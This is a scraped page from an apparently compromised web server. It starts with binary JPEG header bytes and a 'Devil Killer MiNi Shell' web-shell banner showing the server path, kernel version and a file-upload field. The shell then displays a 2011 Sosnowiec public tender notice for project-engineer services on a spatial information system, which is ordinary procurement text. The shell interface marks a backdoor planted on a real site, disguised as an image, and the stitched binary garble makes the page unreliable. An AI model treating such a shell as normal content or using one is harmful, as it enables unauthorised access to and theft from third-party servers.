JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111004/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111004/260709-N-2011.html

<p class="kh_header"><b>Sosnowiec: Świadczenie usług Inżyniera Projektu nad realizacją i wdrożeniem projektu pod nazwą: Budowa Zintegrowanego Systemu Informacji Przestrzennej w Mieście na prawach Powiatu - Sosnowiec</b><br>
<b>Numer ogłoszenia: 260709 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług Inżyniera Projektu nad realizacją i wdrożeniem projektu pod nazwą: Budowa Zintegrowanego Systemu Informacji Przestrzennej w Mieście na prawach Powiatu - Sosnowiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług Inżyniera Projektu nad realizacją i wdrożeniem projektu pod nazwą Budowa Zintegrowanego Systemu Informacji Przestrzennej w Mieście na prawach Powiatu - Sosnowiec w ramach Działania 2.2. Rozwój elektronicznych usług publicznych Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013 (nr naboru 02.02.00-084/09, nr projektu 1081), zwanego dalej Projektem.<br>
1.Zakres przedmiotu zamówienia obejmuje:<br>
1.1.Zapoznanie się przez Inżyniera Projektu ze zgromadzoną dokumentacją dotycząca Projektu i:<br>
1.1.1. dla osiągnięcia zakładanych celów i rezultatów Projektu sprecyzowanie zakresu prac w oparciu o rozstrzygnięcia zaproponowane w Studium Wykonalności;<br>
1.1.2. opracowanie dokumentów, w których zawarte będą niezbędne procesy decyzyjne związane z realizacją i wdrożeniem Projektu, w tym zakres zaangażowania w realizację i wdrożenie Projektu organu wykonawczego Gminy Sosnowiec i pracowników Urzędu Miejskiego;<br>
1.1.3. określenie dla zamawiającego procedur kontroli i składania sprawozdań o stopniu realizacji Projektu jakim powinien zostać poddany wykonawca, który będzie Projekt realizował i wdrażał;<br>
1.1.4. określenie wraz z uzasadnieniem w jakim stopniu powinny być wykorzystane funkcjonujące dotychczasowe struktury organizacyjne Gminy Sosnowiec w realizacji Projektu biorąc pod uwagę utrzymanie i rozwój wskaźników produktu, rezultatu i trwałości Projektu;<br>
1.2.Opracowanie kompletnej dokumentacji dla przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego na realizację i wdrożenie Projektu oraz uzyskanie jej akceptacji przez kierownika zamawiającego w zakresie:<br>
1.2.1. szczegółowego opisu przedmiotu zamówienia obejmującego realizację i wdrożenie Projektu,<br>
1.2.2. wsparcia zamawiającego przy ustalaniu wartości zamówienia obejmującego realizację i wdrożenie Projektu,<br>
1.2.3. opracowania projektów: specyfikacji istotnych warunków zamówienia, zmian treści specyfikacji istotnych warunków zamówienia, wyjaśnień treści specyfikacji istotnych warunków zamówienia zgodnie z postanowieniami zawartymi w art. 36 i 38 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (jednolity tekst - Dz. U. z 25 czerwca 2010 r. Nr 113, poz. 759, ze zmianami);<br>
1.2.4. opracowania projektów: ogłoszenia o zamówieniu zgodnie z postanowieniami zawartymi w art. 41 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (jednolity tekst - Dz. U. z 25 czerwca 2010 r. Nr 113, poz. 759, ze zmianami), zmian ogłoszenia o zamówieniu;<br>
1.3.Przygotowywanie pisemnych opinii dla kierownika zamawiającego i komisji przetargowej, między innymi w sprawach: wykonywanych czynności, oceny złożonych ofert i rozstrzygnięć podejmowanych w procedurze przeprowadzania w trybie przetargu nieograniczonego postępowania o udzielenie zamówienia publicznego na realizację i wdrożenie Projektu.<br>
Ocena wraz z uzasadnieniem zaproponowanego przez wykonawcę Projektu: sposobu organizacji realizowanych prac, procesu realizacji i wdrożenia, w tym opisu kompetencji, podziału zadań i czynności, sposobu komunikacji w Projekcie ( Inżynier Projektu w trakcie trwania procedury o udzielenie zamówienia publicznego występować będzie w charakterze biegłego);<br>
Ocena załączonego do oferty harmonogramu rzeczowo -finansowego realizacji i wdrożenia Projektu pod względem jego zgodności z założeniami Projektu;<br>
Ocena procedur i mechanizmów przedstawionych w ofertach wykonawców pod względem zapewnienia odpowiedniej jakości budowanego i wdrażanego systemu;<br>
1.4.W przypadku postępowania odwoławczego przed Krajową Izbą Odwoławczą, skargowego przed Sądem Okręgowym - przygotowanie wymaganych dokumentów, opracowanie stanowisk i reprezentowanie zamawiającego podczas rozpraw przed tymi organami;<br>
1.5.Opracowanie szczegółowego planu realizacji i wdrożenia Projektu;<br>
1.6.Sporządzanie i przedstawianie zamawiającemu w odstępach czternastodniowych pisemnych sprawozdań z przebiegu realizacji Projektu;<br>
1.7.Uczestniczenie w naradach koordynacyjnych, organizowanych przez zamawiającego, proponowanie rozstrzygnięć w przypadku zgłaszanych przeszkód związanych z realizacją i wdrażaniem Projektu;<br>
1.8.Sprawowanie nadzoru nad realizacją i wdrożeniem Projektu, w tym:<br>
1.8.1. systematyczna kontrola rzeczowej realizacji Projektu obejmująca:<br>
1.8.1.1.potwierdzanie lub nie potwierdzanie merytorycznej zgodności Projektu (przedmiotu objętego umową z wykonawcą), odpowiedniej do deklarowanej w ofercie jakości zastosowanych rozwiązań, liczby, klasy urządzeń i instalacji, poprawności ich montażu, starannego przygotowania zbudowanego systemu do wdrożenia, przeprowadzenia procesu wdrożenia systemu, potwierdzenia uzyskania efektów w zakresie szkolenia pracowników zamawiającego, dokonania czynności odbioru końcowego, przygotowanie dokumentów niezbędnych dla rozliczenia umowy z wykonawcą Projektu;<br>
1.8.1.2.organizacyjną i terminową zgodność Projektu, odpowiednią do deklarowanej w ofercie, w oparciu o przyjęty harmonogram rzeczowo - finansowy;<br>
1.8.1.3.uczestniczenie w przeprowadzaniu koniecznych prób i testów potwierdzających lub nie potwierdzających osiągnięcie wymaganych parametrów i funkcjonalności systemu;<br>
1.8.1.4.identyfikację wad i usterek, proponowanie rozwiązań alternatywnych pozwalających na wyeliminowanie stwierdzonych wad czy usterek;<br>
1.8.1.5.przygotowanie materiałów i dokumentów wytworzonych w trakcie realizacji i wdrażania Projektu dla planowanych i prowadzonych kontroli, w trakcie realizacji Projektu,<br>
1.8.1.6.przygotowanie na żądanie Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego wszelkich dokumentów, informacji i wyjaśnień związanych z realizacją Projektu w wyznaczonym terminie;<br>
1.8.1.7.przeprowadzanie pomiaru wartości wskaźników produktu i rezultatu osiągniętych dzięki realizacji Projektu;<br>
1.8.1.8.sprawowanie nadzoru nad uruchomieniem poszczególnych etapów Projektu;<br>
1.8.1.9.kontrolowanie osiągnięcia celów ( produktów i rezultatów) zakładanych we wniosku o dofinansowanie;<br>
1.8.1.10.uczestniczenie w czynnościach odbioru poszczególnych etapów prac oraz odbioru końcowego zrealizowanego Projektu i jego wdrożenia oraz sporządzenie uzgodnionych z zamawiającym protokołów zdawczo - odbiorczych;<br>
1.9.Przygotowanie i prawidłowe wypełnienie części sprawozdawczych wniosków o płatność z realizacji Projektu nie rzadziej niż jeden raz na trzy miesiące do Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego;<br>
1.10.Rozliczenie finansowe całego Projektu wraz z wnioskiem o płatność końcową i wypełnioną częścią sprawozdawczą z realizacji Projektu.<br>
2.Usługi Inżyniera Projektu nad realizacją i wdrożeniem Projektu należy świadczyć w oparciu o uregulowania, wymogi i standardy zawarte w szczególności w:<br>
2.1.rozporządzeniu Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylające rozporządzenie (WE) nr 1260/1999 - Dz.U.UE.L.06.210.25 z dnia 31 lipca 2006 r., s. 25, ze zmianami;<br>
2.2.rozporządzeniu Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006 r. ustanawiającym szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzeniu (WE) nr 1080/2006 Parlamentu Europejskiego i Rady w sprawie Europejskiego Funduszu Rozwoju Regionalnego - Dz.U.UE.L.06.371.1 z dnia 27 grudnia 2006 r., s.1, ze zmianami;<br>
2.3.rozporządzeniu (WE) nr 1080/2006 Parlamentu Europejskiego i Rady z dnia 5 lipca 2006 r. w sprawie Europejskiego Funduszu Rozwoju Regionalnego i uchylającym rozporządzenie (WE) nr 1783/1999 - Dz.U.UE L.06.210.1. z dnia 31 lipca 2006 r., s.1, ze zmianami;<br>
2.4.rozporządzeniu Komisji (WE) nr 800/2008 z dnia 6 sierpnia 2008 r. uznającym niektóre rodzaje pomocy za zgodne ze wspólnym rynkiem w zastosowaniu art. 87 i 88 Traktatu (ogólne rozporządzenie w sprawie wyłączeń blokowych) (Tekst mający znaczenie dla EOG) - Dz.U.UE L.08.214.3-47. z dnia 9 sierpnia 2008 r., s.3-47, ze zmianami;<br>
2.5.rozporządzeniu Komisji (WE) nr 1998/2006 z dnia 15 grudnia 2006 r. w sprawie stosowania art. 87 i 88 Traktatu do pomocy de minimis - Dz.U.UE L.06.379.5-10. z dnia 28 grudnia 2006 r., s.5-10, ze zmianami;<br>
2.6.ustawie z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (jednolity tekst - Dz. U. z dnia 04 czerwca 2009 r. Nr 84, poz. 712, ze zmianami);<br>
2.7.ustawie z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. z dnia 24 września 2009 r. Nr 157, poz. 1240, ze zmianami);<br>
2.8.ustawie z dnia 23 kwietnia 1964 r. KODEKS CYWILNY (Dz. U. z dnia 18 maja 1964 r. Nr 16, poz. 93, ze zmianami);<br>
2.9.ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity - Dz. U. z dnia 25 czerwca 2010 r. Nr 113, poz. 759, ze zmianami);<br>
2.10. kontrakcie Wojewódzkim dla Województwa Śląskiego, zawartym na podstawie art. 20 ust. 5 ustawy z dnia 6 grudnia 2006 r. o zasadach prowadzenia polityki rozwoju (jednolity tekst - Dz. U. z dnia 04 czerwca 2009 r. Nr 84, poz. 712, ze zmianami), w dniu 6 lutego 2008 r. pomiędzy Rządem Rzeczypospolitej Polskiej oraz Zarządem Województwa Śląskiego.<br>
3.Zamawiający wymaga od wykonawcy skompletowania, uporządkowania, oprawienia i przekazania zamawiającemu dwóch egzemplarzy (oryginałów i kopii sporządzonej z oryginałów) dokumentów wytworzonych przez wykonawcę podczas wykonywania przedmiotu zamówienia.<br>
4.Zamawiający przekaże wykonawcy następujące dokumenty i opracowania:<br>
4.1.STUDIUM WYKONALNOŚCI - Załącznik do wniosku w ramach Działania 2.2 Rozwój elektronicznych usług publicznych Priorytet II. Społeczeństwo informacyjne Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013 Konkurs zamknięty nr: 02.02.00-084/09 Sosnowiec, październik 2009,<br>
4.2.Wniosek o dofinansowanie realizacji projektu ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.11.00-2, 79.42.00.00-4, 72.22.00.00-3, 71.31.80.00-0, 71.63.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą ubiegać się:<br>
1.1.wykonawcy będący osobami fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nie posiadającymi osobowości prawnej, prowadzący działalność gospodarczą jak i nie będący przedsiębiorcami, którzy wykażą brak podstaw do wykluczenia wykonawcy z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy stosownie do sytuacji faktycznej wykonawcy oraz stosownie do formy prawnej prowadzonej działalności.<br> 
1.2.wykonawcy będący osobami fizycznymi, osobami prawnymi lub jednostkami organizacyjnymi nie posiadającymi osobowości prawnej, prowadzący działalność gospodarczą jak i nie będący przedsiębiorcami, którzy wykażą, że spełniają warunki udziału w postępowaniu o udzielenie zamówienia dotyczące:<br>
1.2.1. posiadania wiedzy i doświadczenia w świadczeniu usług w zakresie pełnienia funkcji Inżyniera Projektu nad realizacją i wdrożeniem Projektu obejmującego budowę i wdrożenie zintegrowanego systemu informacji przestrzennej dla miasta lub gminy o wartości co najmniej 1.500.000.00 zł.;<br>
1.2.2. dysponowania osobami zdolnymi do wykonania zamówienia;<br>
1.2.3. znajdowania się w sytuacji finansowej zapewniającej wykonanie zamówienia;<br>
1.3.lub przedstawią pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.<br>
2.Przy ocenie spełniania warunków udziału w postępowaniu przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, dotyczących:<br>
2.1.wiedzy i doświadczenia,<br>
2.2.dysponowania osobami zdolnymi do wykonania zamówienia,<br> zamawiający będzie brał pod uwagę łączny potencjał wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br>
Wiedza i doświadczenie.<br>
3. Zamawiający uzna, że wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia jeżeli wykonawca udokumentuje, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia. Za usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia zamawiający uzna:<br>
3.1.1. świadczenie usługi polegającej na pełnieniu funkcji Inżyniera Projektu nad realizacją i wdrożeniem Projektu obejmującego budowę i wdrożenie zintegrowanego systemu informacji przestrzennej dla miasta lub gminy, o wartości co najmniej 1.500.000.00 zł., który był realizowany na rzecz jednostki samorządu terytorialnego na poziomie powiatu, był współfinansowany środkami pomocowymi Unii Europejskiej oraz został zakończony i prawidłowo rozliczony;<br></p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykonawca udokumentuje, że dysponuje osobami odpowiedzialnymi za świadczenie usługi objętej przedmiotem niniejszego zamówienia, posiadającymi wiedzę, doświadczenie i wymagane uprawnienia w tym:<br>
1.co najmniej jedną osobą posiadającą uprawnienia zawodowe w zakresie:<br>
a)geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne;<br>
b)rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych;<br>
c)fotogrametria i teledetekcja;<br>
zgodnie z postanowieniami zawartymi w art. 43 punkty 1), 2), i 7) ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (jednolity tekst - Dz. U. z 2010 r. Nr 193, poz. 1287, ze zmianami) oraz posiadającą wiedzę i doświadczenie w kierowaniu pracami z zakresu budowy lub modernizacji baz danych ewidencji gruntów i budynków, mapy zasadniczej, sieci uzbrojenia podziemnego terenu, aerotriangulacji, ortofotomapy, numerycznego modelu terenu, oraz trójwymiarowego modelu zabudowy (3D), potwierdzone nadzorowaniem co najmniej trzech Projektów obejmujących budowę i wdrożenie zintegrowanego systemu informacji przestrzennej dla miasta lub gminy, każdy o wartości co najmniej 1.500.000.00 zł., który był realizowany na rzecz jednostki samorządu terytorialnego na poziomie powiatu, był współfinansowany środkami pomocowymi Unii Europejskiej oraz został zakończony i prawidłowo rozliczony;<br>
2.co najmniej dwiema osobami posiadającymi wiedzę i doświadczenie w zakresie wdrażania systemów GIS/SIT, potwierdzone udziałem we wdrażaniu co najmniej trzech systemów GIS/SIT;<br>
3.co najmniej jedną osobą posiadającą wiedzę i doświadczenie w zakresie wdrażania produktów informatycznych w jednostkach samorządu terytorialnego operujących danymi i funkcjami w zakresie budowy baz danych przestrzennych, dedykowanych portali infrastruktury technicznej i metadanych, a także w zakresie umiejętności administrowania relacyjną bazą danych potwierdzone udziałem we wdrażaniu co najmniej trzech takich produktów informatycznych;<br>
4.co najmniej jedną osobą posiadającą wiedzę i co najmniej dwuletnie doświadczenie w opracowywaniu ogłoszeń o zamówieniu i specyfikacji istotnych warunków zamówienia w dziedzinie Projektów obejmujących budowę i wdrożenie zintegrowanego systemu informacji przestrzennej dla miasta lub gminy zgodnie z ustawą Prawo zamówień publicznych, w tym opracowanie co najmniej dwóch kompletów takich dokumentów dla których była obowiązkowa publikacja ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych lub w Dzienniku Urzędowym Unii Europejskiej;<br>
5.co najmniej jedną osobą posiadającą wiedzę z zakresu finansów publicznych i co najmniej dwuletnie doświadczenie w rozliczaniu lub nadzorowaniu rozliczania Projektów obejmujących budowę i wdrożenie zintegrowanego systemu informacji przestrzennej dla miasta lub gminy, w tym rozliczenie lub nadzorowanie rozliczenia co najmniej dwóch Projektów;<br>
Zamawiający oceny spełnienia warunku posiadania wiedzy i doświadczenia dla osób wymienionych w punktach od 1. do 3. dokona na zasadzie sumowania, co oznacza, że jedna osoba może mieć doświadczenie i spełniać wiele wymagań wymienionych w opisie jak również wiele osób może posiadać doświadczenie i spełniać tylko jedno wymaganie wymienione w opisie. W obu przypadkach (jeżeli suma czynności wykonanych będzie zgodna z opisem wymagań) zamawiający uzna, że warunek został spełniony.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący sytuacji finansowej zapewniającej wykonanie zamówienia jeżeli wykonawca udokumentuje, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł.<br>
Uwaga: W przypadku złożenia przez wykonawców dokumentów zawierających dane finansowe w innych walutach niż złoty polski, zamawiający dokona przeliczenia tych danych finansowych na złote polskie w oparciu o średni kurs opublikowany przez Narodowy Bank Polski (Tabela A) w dniu opublikowania ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

